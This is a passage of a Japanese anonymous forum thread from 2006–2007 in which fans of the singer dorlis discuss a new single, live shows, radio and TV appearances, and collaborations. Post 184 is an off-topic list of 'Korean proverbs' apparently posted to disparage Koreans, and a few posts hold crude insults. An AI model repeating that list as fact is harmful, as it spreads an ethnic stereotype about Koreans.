君の文章わかりやすいね^^

142 :名無しの歌姫:2006/08/20(日) 19:59:59 ID:ABMLFeKR
ストリート2にドリタソのメッセージカード入ってたんだけど、みんなあった?

143 :名無しの歌姫:2006/08/20(日) 21:21:57 ID:tLSyLSuH
>>142
タワレコで買ったらついてきたよ。

144 :名無しの歌姫:2006/08/23(水) 21:34:48 ID:9bHTuPL9
君色カレンダー

いいわ。

145 :名無しの歌姫:2006/08/27(日) 01:57:15 ID:jl5SaCpZ
ぐるぐるあげる

146 :名無しの歌姫:2006/08/27(日) 06:58:36 ID:FL5zUsV2
公式ブログで新曲の話一言書いてあったね。
いつかな、早く聴きたいわ

147 :名無しの歌姫:2006/08/28(月) 20:19:49 ID:XeQQUyl/
ドルリス可愛いよドルリス

148 :名無しの歌姫:2006/08/28(月) 20:29:24 ID:jsTXjNtc
HMVいったら「doris」だった・・・(´・ω・`)


(´;ω;`)ウッ・・・

149 :名無しの歌姫:2006/08/30(水) 18:00:04 ID:tdVRmwh9
dorlis売れて欲しい気もするが なぜ売れない

150 :名無しの歌姫:2006/08/30(水) 19:10:05 ID:46VC7+eY
やっとパソコンが復活した・・・
オーサカキング直後に壊れて修理(´・ω・`)


>>149
聴かせた友人には軒並み好評なんだがなあ
単純に広報・宣伝に力をいれてないのか、レーベル間の権力闘争に敗れてるのか

151 :名無しの歌姫:2006/09/03(日) 20:54:49 ID:AilPoJgd
あげてませう

152 :名無しの歌姫:2006/09/06(水) 21:28:51 ID:X3aob6HH
新曲完成あげー

153 :名無しの歌姫:2006/09/08(金) 00:12:05 ID:zjTNwl1e
市民プールではしゃぐ
そ〜の姿〜
 
この時期発売ということで歌詞は変わるかと思うがいい曲なのは間違いない!
発売が待ち遠しい

154 :名無しの歌姫:2006/09/09(土) 07:51:10 ID:PjnImVxf
新曲完成キタ━(゚∀゚≡゚∀゚)━!!

155 :名無しの歌姫:2006/09/10(日) 09:10:22 ID:vSn3klCR
新曲、市民プールとスケートリンクの歌みたいだぞ。
いいー

156 :名無しの歌姫:2006/09/12(火) 22:46:08 ID:tMN0nnbd
age


age



157 :名無しの歌姫:2006/09/13(水) 18:53:27 ID:O/jklNbS
age

158 :名無しの歌姫:2006/09/15(金) 19:12:20 ID:eq/JGl/5
今日ラジオで新曲放送してたぞ。市民プールとスケートリンクって言ってて、来週はじっくり曲解説をするそうだ。

159 :名無しの歌姫:2006/09/15(金) 20:31:22 ID:4vkEhQO/
ttp://www.youtube.com/watch?v=LIhbap3FlGc&eurl=

160 :名無しの歌姫:2006/09/17(日) 01:28:25 ID:vET6l4Sb
(´・Θ・)つ■~

161 :名無しの歌姫:2006/09/18(月) 05:05:01 ID:CMk/st1q
発売日発表マダァー? (・∀・ )っ/凵⌒☆チンチン

162 :名無しの歌姫:2006/09/21(木) 22:51:22 ID:APCUduor

 ( ゚д゚)  
_(__つ/ ̄ ̄ ̄/_
  \/    /




  ( ゚д゚)
_(__つ/ ̄ ̄ ̄/_
  \/    /






  ( ゚д゚ )
_(__つ/ ̄ ̄ ̄/_
  \/    /

163 :名無しの歌姫:2006/09/22(金) 01:06:48 ID:h3BcTVD0
こっちみんな

164 :名無しの歌姫:2006/09/23(土) 00:51:30 ID:8lpHNSYC

+   +
  ∩_∩  +
 (0゚・(ェ)・)ドキドキ クマクマ
 (0゚つ旦O +
 と__)__) +

165 :sage:2006/09/23(土) 11:42:39 ID:b8zCG+9H
Swingin'partyに入ってる
EXTRA DATA雪のライスシャワーPVが見れないのですが皆さんはパソコンで再生できますか?

166 :名無しの歌姫:2006/09/23(土) 14:24:31 ID:94rMUTV6
いまみた
みれた

QT4とか導入してないだけじゃね?

167 :ドリチン:2006/09/28(木) 18:48:59 ID:lNOnT0U6
土曜日の高知のライブいきますヨ^−^
新曲まだ聴けてないから楽しみ♪

168 :名無しの歌姫:2006/09/28(木) 20:20:04 ID:a9TcoPoe
今年も関西圏の大学学園祭にこないかなー(´・ω・)

169 :名無しの歌姫:2006/09/28(木) 20:58:43 ID:Vkujrcmb
あたしゃ岩手にきてほしいよ(´・ω・`)


170 :名無しの歌姫:2006/09/29(金) 18:08:07 ID:cKzYOMo5
ブログ2日連続で書くなんて久しぶり?
毎日書いて欲しいな(´・ω・`)
新曲発売前だし

171 :名無しの歌姫:2006/09/30(土) 20:20:27 ID:q+N2FfqT
情報キタキタキタ━(゚∀゚≡゚∀゚)━!!

172 :名無しの歌姫:2006/10/01(日) 23:27:34 ID:PorLexQV
今日、川崎に行ってきました。

1 太陽のスキャット
2 市民プールとスケートリンク
3 24時間世界一周

と短かったけど、トークが面白かった。詳細は今週と来週の土曜朝8時から
TOKYO FMで聞けますよ。

173 :名無しの歌姫:2006/10/02(月) 23:20:31 ID:y7epM26Z
市民プールとスケートリンク・・・
題名どうよ?www

174 :名無しの歌姫:2006/10/03(火) 00:09:58 ID:zaOchbSD
>>173
ライブとかで披露してたときは
「市民プール(仮)」
だったからオレは違和感はだいぶある。

まぁ歌詞の感じからしょうがないんじゃないかと、、、

んなこと言ってても予約して買うんだけどさぁ



175 :名無しの歌姫:2006/10/03(火) 02:12:38 ID:1t6llCx9
センスがあるとは言わないが

題名とかぶっちゃけ気にしてません


「ミ●モニ。じゃんけんぴょん」とかだったら引くけど(;^ω^)

176 :名無しの歌姫:2006/10/03(火) 02:45:29 ID:BxcFLcag
市民プールだけじゃいろいろマズかろうね(´・ω・`)
スケートリンク…レールリンク

177 :名無しの歌姫:2006/10/03(火) 03:46:40 ID:nesYzUaV
例の事故のせいで市民プールのイメージ最悪だけどな。

178 :名無しの歌姫:2006/10/05(木) 00:55:17 ID:OfChuHJx
曲はいいんだけどな。

179 :ゴルァァァ!:2006/10/05(木) 23:20:03 ID:ZtwY64o1
169番は脇会員やろ!?

180 :ゴルァァァ!:2006/10/06(金) 01:15:09 ID:1KeTyR1U
間違えた!167番やった

181 :名無しの歌姫:2006/10/06(金) 18:50:18 ID:aXobBub3
先行配信おめ、age

182 :名無しの歌姫:2006/10/06(金) 19:39:20 ID:LqY3r+Qi
先行配信きいたage

183 :名無しの歌姫:2006/10/07(土) 09:35:28 ID:V4S55Lc+
365ageメイト

184 :名無しの歌姫:2006/10/07(土) 22:04:32 ID:1D29zrtQ
【 韓国のことわざ 】

「泣く子は餅を一つ余計もらえる」
「川に落ちた犬は、棒で叩け」
「弟の死は肥やし」
「ただの物は苦くても甘い」
「一緒に井戸を掘り、一人で飲む」
「他人の牛が逃げ回るのは見ものだ」
「自分の食えない飯なら灰でも入れてやる」
「銭は汚く儲けても、きれいに使えばよい」
「他人の家の火事見物をしない君子はいない」
「梨の腐ったのは娘にやり、栗の腐ったのは嫁にやる」

185 :名無しの歌姫:2006/10/08(日) 16:42:46 ID:o1QLP12j
ブログかわええなぁ(´・ω・`)

186 :名無しの歌姫:2006/10/09(月) 09:54:11 ID:MBuMXkdf
食べるな金太(´・ω・`)

187 :名無しの歌姫:2006/10/09(月) 09:56:04 ID:Y1PBfkMK
岡山の恥さらし者

188 :名無しの歌姫:2006/10/09(月) 10:17:35 ID:MBuMXkdf
>>187
星野さんの事を悪く言わないで(´・ω・`)

189 :名無しの歌姫:2006/10/09(月) 17:27:18 ID:9drQ5Rgm
>>187
それは俺のことじゃまいか









すまんこ(´・ω・`)

190 :名無しの歌姫:2006/10/11(水) 21:13:40 ID:3drrZmA2
星野?

191 :名無しの歌姫:2006/10/12(木) 01:10:01 ID:uF13DIr4
1001?

岡山は良い印象ないな・・・誰にではないがスマソ

192 :名無しの歌姫:2006/10/13(金) 20:49:49 ID:5OH/Eafa
市民プールが凍ってスケートリンクみたいになるってことかね?

193 :名無しの歌姫:2006/10/13(金) 22:07:11 ID:5s7V85oU
イメージとしては俺もそんな感じですかね。

夏はプール。冬はスケートリンク。

194 :名無しの歌姫:2006/10/16(月) 01:04:58 ID:LGnDLFXU
それで一夏の恋が終わるとかかねぇ

195 :名無しの歌姫:2006/10/22(日) 15:59:48 ID:SXjnXBSO
age保守

196 :名無しの歌姫:2006/10/22(日) 16:24:02 ID:c9EM9YpS
agege

197 :名無しの歌姫:2006/10/25(水) 23:41:59 ID:XLD9fsGg
age

198 :名無しの歌姫:2006/10/30(月) 02:48:26 ID:z7evuFwh
ぐ〜るぐるageる〜


ブログはメンへらじゃないと思いますw

199 :名無しの歌姫:2006/10/30(月) 09:53:09 ID:0TZGnN5e
どりのブログは何故か面白いから困る

200 :名無しの歌姫:2006/10/30(月) 11:05:46 ID:ZlbkFEkP
人形キャラはいい加減飽田

201 :名無しの歌姫:2006/10/30(月) 19:16:11 ID:EoSDS/Sb
飽きる名予

てか、今度大西ユカリとセッションするらしい。
配信は一月頃とか言ってたかな。

202 :名無しの歌姫:2006/10/31(火) 01:18:15 ID:zfBMg5sT
ドリなら人形遊びしててもなんら不思議じゃない

203 :名無しの歌姫:2006/11/01(水) 10:52:01 ID:F++kJoLl
コバ氏のクリスマスライブにゲスト出演するとの事。
12月の8,9日で8が岡山9が広島だって。
行く人いる?

204 :名無しの歌姫:2006/11/02(木) 14:32:08 ID:NSJwSboi
別ver.の曲はどうなっとるんじゃゴルァー

205 :名無しの歌姫:2006/11/04(土) 10:18:05 ID:/idgkF1I
これから宇都宮でのラジオ公開録音いってきま(^^)

206 :名無しの歌姫:2006/11/04(土) 13:16:40 ID:6ZEyIT5t
レポよろ

207 :205:2006/11/04(土) 13:49:05 ID:edeufH1G
とりあえずいつも通り幅広い年齢層の客
2時スタートだがすでに結構人いる


208 :名無しの歌姫:2006/11/05(日) 01:30:56 ID:Kmng8jOK
をれは新曲普通すぎてあんま好きやないんだがな・・

209 :名無しの歌姫:2006/11/05(日) 05:54:33 ID:JlU7bw50
もう売れないよ

210 :名無しの歌姫:2006/11/07(火) 01:52:19 ID:Yl1i5xqm
よし、お前ら好きな曲書けや

211 :名無しの歌姫:2006/11/07(火) 04:28:42 ID:8b2rjo3K
365プレイメイトの歌がお経のように聞こえます

212 :名無しの歌姫:2006/11/07(火) 14:23:58 ID:iPU6WVbb
月ドロボウやら恋のポリグラフやら八重芯やら。
正直どれも好きだから特にと言われたらこの三つ

213 :名無しの歌姫:2006/11/07(火) 15:02:45 ID:yWa4l6P5
24時間世界一周は外せない
磁石の肌はライブで聴いて大好きになった
あとはマリポーサとかマーブルの月、恋のポリグラフのような曲調大好きです

214 :名無しの歌姫:2006/11/07(火) 17:05:02 ID:iPU6WVbb
>>213
あぁ、磁石の肌をライブで聴くといいよなぁ。

215 :名無しの歌姫:2006/11/07(火) 18:35:08 ID:5rNAkaK9
確かにどれも好きで一番が決められない
何度聴いても飽きないし

ちなみに話変わって第二段コラボはソッフェらしい。

216 :名無しの歌姫:2006/11/07(火) 19:19:38 ID:iPU6WVbb
kwsk

217 :名無しの歌姫:2006/11/07(火) 23:03:57 ID:yWa4l6P5
kwsk

218 :名無しの歌姫:2006/11/08(水) 00:07:07 ID:bw79EGRU
なんか来年の1月〜3月にかけて毎月アーティストとコラボして曲配信するんだって
相手はあんま覚えてない
第1段はなんたらユカリさん


219 :名無しの歌姫:2006/11/08(水) 18:42:32 ID:1mBm6jwZ
第一弾 大西ユカリ
第二段 ソッフェ
第三弾 不明

それにしても超重大プロジェクトって何じゃろ?

220 :名無しの歌姫:2006/11/09(木) 00:20:26 ID:WvLFxUwH
公式サイト(PC)にはスタッフブログにて、いろいろ書いてたけど…
それのことじゃないかね?

221 :名無しの歌姫:2006/11/13(月) 00:21:53 ID:X8lyJRG/
あげ
最近携帯のブログも更新があってありがたいね

222 :名無しの歌姫:2006/11/13(月) 10:08:13 ID:LZLUtYP3
こいつのCDって音がシャリシャリしてて安っぽいイメージがある
ジャケもマンネリイラストだし

223 :名無しの歌姫:2006/11/13(月) 11:14:32 ID:TIjzFIQu
もういくつねーるーと22日〜
22日にはCD買ってー
プレイーヤーで回して聴きましょおー
はーやく来い来い22日〜♪


224 :名無しの歌姫:2006/11/13(月) 14:51:21 ID:J5ieJ2l8
>>223
21日でもいいぞなもしw

225 :名無しの歌姫:2006/11/13(月) 21:47:32 ID:nZ7rOUdf
dorlis Walker配信あげ

226 :名無しの歌姫:2006/11/16(木) 12:24:28 ID:eLldh7wD
スケートリンクver.ってもう視聴できてたんだな
初めてしった・・・or2

227 :名無しの歌姫:2006/11/17(金) 12:17:28 ID:W5i4UMPl
今日いいともに出てるソッフェに花送ってたね。

228 :名無しの歌姫:2006/11/17(金) 15:11:12 ID:jgtckYEH
>>227
うp


講義で見られなかった・・・orz

229 :名無しの歌姫:2006/11/17(金) 15:14:55 ID:W5i4UMPl
>>228
いや、撮ってないってか、テレホンショッキングあるじゃん?
アレにソッフェが出て、花輪っていうんだっけ?後ろに飾られてるヤツ。
あれをドリも送っていたって話。
数が多くて廊下に飾られてたがorz

230 :名無しの歌姫:2006/11/17(金) 15:23:59 ID:jgtckYEH
廊下(´・ω・`)ショボーン


気を取り直してあと数日wktkしてます。

231 :名無しの歌姫:2006/11/17(金) 16:59:28 ID:joUN3qfy
今TVKで「市民プールとスケートリンク」のPVやってて、見入ってしまった。
音楽と映像で引き込まれる感じ。ステンドグラス調の映像も幻想的で。
dorlis知らなかったんだけど、ファンになりそうでつ

232 :名無しの歌姫:2006/11/18(土) 01:24:49 ID:Atj2mlqL
>>229ソッフェってSOFFet?仲良かったんだ。
好きなアーティスト同士仲良さ気だとなんか嬉しいな。
最近ソッフェ聴いてないけれども。

233 :名無しの歌姫:2006/11/18(土) 21:35:39 ID:x70WDOBH
>>232
>>215-219

234 :名無しの歌姫:2006/11/19(日) 21:26:53 ID:sRgH6rfy
とりあえずアゲ

235 :名無しの歌姫:2006/11/20(月) 06:55:44 ID:JSKgs9Jq
フラゲまで後一日

+   +
  ∧_∧  +
 (0゚・∀・)   ワクワクテカテカ
 (0゚∪ ∪ +
 と__)__) +


236 :名無しの歌姫:2006/11/20(月) 21:43:17 ID:uYfZe4XD
今回はMusicEdge出演なし?

237 :名無しの歌姫:2006/11/20(月) 22:33:00 ID:JSKgs9Jq
そういう情報はきいてないです
曲紹介くらいならやるかもしれないけど

でもedgeは発売後に放送するイメージが・・・www

238 :名無しの歌姫:2006/11/21(火) 14:56:52 ID:Mi470A7z
フラゲあげ

239 :名無しの歌姫:2006/11/21(火) 21:32:20 ID:9gzEDv7X
フラゲして来たどー!!!

[市民プールとスケートリンク]
   ヽ('∀`;)ノ<ナゲェ


で、早速聴いて見た・・・
M3|<巻き舌キトゥワーッ!!

240 :名無しの歌姫:2006/11/22(水) 08:35:55 ID:4Z/yDJoS
フラゲしたのに書き込むのが今日って・・・orz

市民プールとスケートリンク(・∀・)イイ!!
PV動画も(・∀・)イイ!!

二つとも単体だと素晴らしいんだがうまくマッチしてないような・・・?

でも(・∀・)イイ!!

241 :名無しの歌姫:2006/11/22(水) 16:46:59 ID:VYR3fiiQ
発売日なのに盛り上がんないなぁw
あとで買ってきます

242 :名無しの歌姫:2006/11/22(水) 19:36:04 ID:MVszCmJJ
今日は泊まりの仕事(´・ω・`)アシタモカエレナイシ

243 :名無しの歌姫:2006/11/22(水) 21:56:14 ID:7j5NwoYu
かなり普通の曲・・・
ものすごいファンだけに残念です。

244 :名無しの歌姫:2006/11/23(木) 06:11:24 ID:Xb3k3vH9

今回は2曲目が本命なワケですよ♪。
来年のコラボ企画に期待。風味堂ともやらないかな〜☆同じレコード会社だし。

245 :名無しの歌姫:2006/11/23(木) 15:06:42 ID:Qe9iIyrJ
PVがアニメ→クレイアニメ→影絵
と来たから、次は3D?

246 :名無しの歌姫:2006/11/23(木) 16:06:09 ID:RVatL17/
なにがコラボだよバカ

247 :名無しの歌姫:2006/11/24(金) 17:34:35 ID:gzEoykbO
まだ聴いてないけど、ポスターもゲット。まだありそうだよ。

248 :名無しの歌姫:2006/11/24(金) 21:07:06 ID:ZcMpoGf8
今回の曲、元ちとせみたいな感じなのは気のせい?

249 :名無しの歌姫:2006/11/24(金) 21:20:30 ID:hb7NK8fD
個人的に元ちとせは苦手だったがこれは受け入れられる
単純な声質の好みですけどね

250 :名無しの歌姫:2006/11/24(金) 22:33:36 ID:NLBMNlGE
ドリスタッフがmixiで必死なってるのが笑えるw

251 :名無しの歌姫:2006/11/25(土) 14:06:22 ID:Q29VXzHj
さすがにそろそろ必死にならんとな・・・w

252 :名無しの歌姫:2006/11/25(土) 16:11:05 ID:+51t2Il1
今まで必死になってた印象すらなかったからな

253 :名無しの歌姫:2006/11/26(日) 03:20:37 ID:8CxHQa2P
2曲目いいねぇ〜
3曲目もまぁまぁ
1曲目はちょっと・・・

254 :名無しの歌姫:2006/11/26(日) 03:25:53 ID:sygGEpv4
iTunesで取り込もうとしても
トラック情報がデータベースになくて取得できない件


orz

255 :名無しの歌姫:2006/11/26(日) 03:54:08 ID:BZve/yCo
トラック名取得できないときは自分で曲名打ち込んで
送れば、あとから取り込んだ人全員が助かるのだ。

256 :名無しの歌姫:2006/11/26(日) 07:56:18 ID:Md915Ccx
>>255
つーか、それってスタッフサイドの仕事なのにね
CDDBに登録されてないと寂しい気分になる
サンプル盤出来た時点でちゃんとやっとけYO!

257 :名無しの歌姫:2006/11/26(日) 13:53:09 ID:0uq+XNaL
いつの間に昨日札幌でライブがあったの?行った人レポートよろ

258 :名無しの歌姫:2006/11/26(日) 21:12:00 ID:WRdgr8wH
>254
俺、火曜にフラゲして、打ち込んで送信したんだけどな〜・・・
うまく行かんかったか?

>253
俺は3曲目がどうも・・・

259 :名無しの歌姫:2006/11/27(月) 05:35:10 ID:9w4Mqeui
今回の曲っていつ作ったんだろう。素朴な疑問。
自分は歌詞とかすきだけどな。市民プール。
3曲目が神がかってると思う。

260 :名無しの歌姫:2006/11/27(月) 21:59:55 ID:d+csEmaL
>>258
3曲目は最初イマイチでも耳が慣れてくると・・・

261 :名無しの歌姫:2006/11/27(月) 22:18:34 ID:SSnG01S5
3曲目は慣れると(・∀・)イイ!!

262 :名無しの歌姫:2006/11/27(月) 23:05:36 ID:jnBUHy9b
>>259
7月にあった横浜でのライブでは披露してたよ
市民プール(仮)って題名で

263 :名無しの歌姫:2006/11/28(火) 20:41:01 ID:QuH6BvWf
>>262
そうなんだ?仮ってことはわりと最近なのかな。
てっきり弾き語り時代のストックかと思ってた。

ところで着歌のver違いって、サビが違うって事?

264 :名無しの歌姫:2006/11/30(木) 07:04:26 ID:EHGutK2k
ドリタソブログでたまに
w使うのが凄い気になる

265 :名無しの歌姫:2006/11/30(木) 08:55:58 ID:1Ji1zH8B
wは市民権獲得してるから使ってても違和感ないだろ

実はここみてて本日以降草生やさなくなったりなwww

266 :名無しの歌姫:2006/12/03(日) 07:29:54 ID:UgdYZddR
市民プールはスルメだなぁ。切なくなる…
ドリタソの声って細くて囁くようだから、感情移入したら止まらない

267 :名無しの歌姫:2006/12/05(火) 19:32:48 ID:Tb0ISS6s
雪のライスシャワーのサビの最後の、
「誓いのキスを 未来の地図を…」
の後って何て言ってます?

うたまっぷとか歌ネットとかいろいろみたけど、
この曲はどこにも歌詞載ってないんです。

どなたか教えてくださいませんか?

268 :名無しの歌姫:2006/12/05(火) 20:02:38 ID:W6iaf3W9
swingin' party買えばわかるよ!

                   ハ_ハ  
                 ('(゚∀゚∩ わかるよ!
                  ヽ  〈
                   ヽヽ_)

269 :名無しの歌姫:2006/12/05(火) 23:44:21 ID:6ZUxntyv
http://www.ytv.co.jp/west21/index_set.html

関西地区、観覧申し込みできないのおいらだけ orz
マンガ喫茶のはピンクのリンク先が現れるのに、
家pcだと出ない。。。マンガ喫茶で応募する勇気がない。


270 :名無しの歌姫:2006/12/06(水) 04:27:34 ID:4sDe/jqJ
11月中ですけど普通に申し込みできました

ttps://www.ytv.co.jp/west21/dorlis/index.html

直リンでもダメ??

271 :名無しの歌姫:2006/12/08(金) 09:47:16 ID:c74FswFi
west21公開収録ライブの当選通知電話キタ━━━━━━(゚∀゚)━━━━━━ !!!!!


っていう書き込みないね(´・ω・`)
昨夜にかかってきたの俺だけですか?

272 :名無しの歌姫:2006/12/08(金) 10:44:54 ID:aqGbXgEZ
ドリファンは2ちゃんやってる人少ないんだよ

273 :名無しの歌姫:2006/12/09(土) 22:11:54 ID:AYOd4NNX
市民プールって一青窈の「さよならありがと」に似てね?

274 :名無しの歌姫:2006/12/09(土) 22:43:47 ID:wPKPp9wN
↑思っても口に出すな。

275 :名無しの歌姫:2006/12/09(土) 22:44:18 ID:JwaX0QbN
似ていることの何が悪いのか

276 :名無しの歌姫:2006/12/10(日) 00:13:08 ID:XPTvSSgm
アレンジもどことなく雰囲気が・・・
やっちゃった?ドリタソ

277 :名無しの歌姫:2006/12/14(木) 11:54:51 ID:ohof2TtD
岡山のライブ、cobaタンも来るって…。

ギザウラヤマシス。

278 :名無しの歌姫:2006/12/14(木) 12:08:26 ID:0FBZKiMs
ギザウラヤマシス

俺は今日のライブで我慢するお

279 :名無しの歌姫:2006/12/14(木) 20:17:22 ID:e1asOpp/
>>276
今は、どのミュージシャンも似たり寄ったりな事してるよ。流行を無視
したような音作りだけじゃ食ってけないからね。
鳴かず飛ばずというか、オリコン1位が無理なら、そうするのが自然でしょ。


280 :名無しの歌姫:2006/12/14(木) 23:28:14 ID:PraEgw6c
楽しかったお( ^ω^)
やっぱり生歌はイイ

281 :名無しの歌姫:2006/12/15(金) 19:57:27 ID:k8bLY0Xg
↑京橋のライブハウスかな?

282 :名無しの歌姫:2006/12/15(金) 19:58:34 ID:k8bLY0Xg
>>280 書き忘れ。
バンドの編成とか演奏のクオリティーとかどうでした?

283 :名無しの歌姫:2006/12/19(火) 00:32:38 ID:Qkr+QnRb
放送あるみたいね
wktk

284 :名無しの歌姫:2006/12/19(火) 23:34:40 ID:w59pD94/
メンズキラーシスターズなかなかよかった。
なぜかものすごい大阪感あったなー


285 :名無しの歌姫:2006/12/20(水) 01:52:48 ID:xuYhTCax
大阪感て何?

286 :名無しの歌姫:2006/12/20(水) 04:00:00 ID:eVXPgEB4
この人ってデビュー前、よく高島屋の近くのCoCo壱前とかで歌ってたよね?


287 :名無しの歌姫:2006/12/20(水) 19:59:42 ID:Bic79/Ti
おまいら本日27時頃からwest21ですよ

どりちゃんでますよ

288 :名無しの歌姫:2006/12/21(木) 00:08:25 ID:iz5JIF9N
HDD準備桶(`・ω・´)
実況行くべし

289 :名無しの歌姫:2006/12/21(木) 04:00:24 ID:GAY+vmQV
お腹いっぱい(´・ω・`)
いやー、えがったえがった

290 :名無しの歌姫:2006/12/21(木) 10:17:50 ID:60GUryZq
寝過ごした\(^o^)/

291 :名無しの歌姫:2006/12/21(木) 17:14:29 ID:hqeIoV4V
地元岡山、倉敷チボリ公園にて大晦日カウントダウンライブ。

行きたいけど1才の子供を連れては無理だわなぁ・・・

292 :名無しの歌姫:2006/12/22(金) 00:49:10 ID:PtK7miD0
mjd?せっかく行ける距離なのに用事あるし…

293 :名無しの歌姫:2006/12/23(土) 17:51:09 ID:8OtkwSqy
west21見逃したprz

誰かうpしてくださる神はいませんか・・・

294 :名無しの歌姫:2006/12/24(日) 21:06:43 ID:YDUB2tHH
パケラジ

295 :名無しの歌姫:2006/12/28(木) 18:26:39 ID:mRXskO7G
しばらく書き込みないな
ってことであげ〜

296 :名無しの歌姫:2006/12/31(日) 07:37:26 ID:Bp/dLpK6
今日行く人、寒いから温かい格好していけよ〜。

297 :名無しの歌姫:2006/12/31(日) 23:02:59 ID:IURU9LYg
来てます。
生歌いいわ。

298 :名無しの歌姫:2007/01/01(月) 07:10:44 ID:m0Xcve7g
あけおめ。ライブ行った人乙、うらやましいわ。
今年のドリタソの動向に期待

299 :名無しの歌姫:2007/01/01(月) 10:12:32 ID:BGsXcQ8V
CDの切ないか細い声のイメージが強かったから生の力強い声にまた惚れ直したわ。
結構歌ってくれたのも嬉しい。
ただ、子供がグズって『ひとりごと〜』を聞き逃したのが悲しかった・・・

300 :名無しの歌姫:2007/01/01(月) 11:55:41 ID:EFVP6WW+
あけおめage
来年のdorlisもめちゃ楽しみ!

301 :名無しの歌姫:2007/01/01(月) 23:20:11 ID:k4N5SOI1
>>300
携帯版の966みたいなミスだw
それにしても、携帯版の掲示板に
2年連続元日挨拶はいいけど
blogも頼むよドリタソ(´・ω・`)

302 :名無しの歌姫:2007/01/01(月) 23:22:02 ID:k4N5SOI1
933でしたorz

303 :名無しの歌姫:2007/01/02(火) 05:44:45 ID:h/9W0RG/
>>301
同じ人だったりしてなw
でもブログ更新なしか。次回更新はカウントダウンライブの様子うpかな。
楽しみ

304 :名無しの歌姫:2007/01/04(木) 01:08:50 ID:Uj5FGIwE
グッジョブ!
http://www.youtube.com/watch?v=-iMCA6EIPLc
編集ミスあるが許そうw

305 :名無しの歌姫:2007/01/06(土) 18:44:42 ID:GnZb6A3v
あげ

306 :名無しの歌姫:2007/01/10(水) 16:45:18 ID:qyV4jCOF
あげとく?

307 :名無しの歌姫:2007/01/13(土) 17:31:46 ID:C9CWyenn
あれ?パソからだとダメなのに

308 :名無しの歌姫:2007/01/13(土) 17:34:04 ID:Sf5t+LoV
事故解決しました

309 : ◆Night/GFqw :2007/01/14(日) 02:28:56 ID:HsgsCu10
HAPPYスウィング

310 :名無しの歌姫:2007/01/16(火) 09:24:10 ID:PuRKZex8
おーい明日いよいよ配信スタートだよ!!

311 :名無しの歌姫:2007/01/16(火) 18:03:12 ID:z+jYTqQM
.   ∩____∩: :.+
ワク. | ノ      ヽ+.:
:.ワク/  ●   ● | クマ 
  ミ  '' ( _●_)''ミ クマ  。
. /  ._  |_/__ノヽ
 -(___.)─(__)─

312 :名無しの歌姫:2007/01/17(水) 01:25:13 ID:7KhlE+fi
HPでちょっと聞けるぞ、こりゃよさそうっす!
ドリの原点っぽくていいな。

313 :名無しの歌姫:2007/01/17(水) 11:44:31 ID:UyFfsHtV
携帯で無限ループ中

こういうの好きですw

314 :名無しの歌姫:2007/01/18(木) 23:00:22 ID:nZzrvLUf
記念age

315 :名無しの歌姫:2007/01/19(金) 13:35:35 ID:yHSHQqh2
着うた取った
正直微妙かも(´・ω・`)
何回も聞いてるうちに
よくなってくるパターンなら
いいけど・・・

316 :名無しの歌姫:2007/01/19(金) 14:33:25 ID:CoaufHni
俺はこういう系好きだお( ^ω^)

317 :名無しの歌姫:2007/01/23(火) 06:04:31 ID:jCV9TfCZ
age

318 :名無しの歌姫:2007/01/23(火) 10:29:35 ID:sH76UMQY
オレも好きだ、というかdorlisの王道。

319 :名無しの歌姫:2007/01/25(木) 23:35:58 ID:5cn0lhpA
ほ〜ほえ〜むだ〜けで〜♪

320 :名無しの歌姫:2007/01/27(土) 08:42:11 ID:htvbFZOG
今ニュース見てて思ったんだけどAPAホテルの女社長と
dorlisイラストの顔ってなんか似てる...

321 :名無しの歌姫:2007/01/27(土) 10:32:04 ID:14zVjJva
この人、顔出さないんですか?いつもジャケがイラストだけど、あれに似てるの?

322 :名無しの歌姫:2007/01/27(土) 11:09:10 ID:61MnWbvA
出してますよ。
テレビ出演もされてますし、PVにも出られてるのがあります。
ジャケに似てますw

323 :名無しの歌姫:2007/01/27(土) 13:01:59 ID:Q6FUi5ic
八重芯なんか特に出ているんじゃないかな?

324 :名無しの歌姫:2007/01/29(月) 23:58:11 ID:Dkms0jv0
ライブを録画してたHDDが
消えたぞ
ソニーのこんちくしょうめが(#^ω^)


325 :名無しの歌姫:2007/01/30(火) 00:10:30 ID:+nuEEL59
おま・・・
なんで事前に俺にデータを渡しておかなかったんだ・・・orz

326 :名無しの歌姫:2007/01/31(水) 03:46:06 ID:U1jJfE8e
俺ペコのともはちょっと微妙だが
ドリはなかなかかわいい、、ってか細巨乳。

327 :名無しの歌姫:2007/02/02(金) 14:02:29 ID:T8sWtsJc
2/19
MUSIC EDGE
にSOFFetとでる見たい( ^ω^)

328 :名無しの歌姫:2007/02/02(金) 19:40:03 ID:IZ7GCg1m
情報サンクス

329 :名無しの歌姫:2007/02/04(日) 09:12:30 ID:E5F0nWZt
メンズキラー☆シスターズ

330 :名無しの歌姫:2007/02/04(日) 16:08:35 ID:DvN43BTg
dorlis.net以外、最近更新少ないな。

331 :名無しの歌姫:2007/02/06(火) 23:42:43 ID:PFNGSXFA
あげるか〜
さて次のコラボ曲はいかかがなものになるかね

332 :名無しの歌姫:2007/02/11(日) 10:15:06 ID:k5FEeq2s



333 :名無しの歌姫:2007/02/11(日) 21:35:41 ID:QEZuAShV
あと3日age

334 :名無しの歌姫:2007/02/12(月) 00:33:49 ID:2M9J6K/K
とりあえず今聞いてるラジオでオンエアするらしいから、一人ワクテカ@栃木

335 :名無しの歌姫:2007/02/12(月) 01:16:36 ID:raEttr7P
>>334
うp!うp!

発売2日前なのに視聴もできないとは(´・ω・`)

336 :名無しの歌姫:2007/02/12(月) 02:32:12 ID:aRRqd3qo
敢えてアルバムの雰囲気で例えるとしたら スゥインギンパーティーみたいなコラボ曲

メンズキラー☆シスターズ

337 :名無しの歌姫:2007/02/12(月) 23:39:23 ID:2M9J6K/K
うpしますよ〜
わくわく抜け駆け大作戦http://k.pic.to/apctg
携帯録音だから音極悪だが、曲の感じくらいは分かるかなと、、、

338 :名無しの歌姫:2007/02/13(火) 00:13:44 ID:qsqaWjKD
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

けどピクトはこの時間パソコンからみられない\(^o^)/
俺の携帯じゃ表示できない/(^o^)\

聴けない(´・ω・`)

339 :名無しの歌姫:2007/02/13(火) 22:30:47 ID:DtEn7jAQ
>>337
携帯で聞いた
俺は第1弾より好きだな
ラップとやらはしんどいけど

340 :名無しの歌姫:2007/02/13(火) 22:40:04 ID:vkMneg07
SOFFetのラップが好かない
でもdorlisの声は意外とラップにも合うと思った
ちなみに第1弾派です

341 :名無しの歌姫:2007/02/13(火) 23:27:42 ID:jcNBUGnZ
アルバムどうなるんだろ?

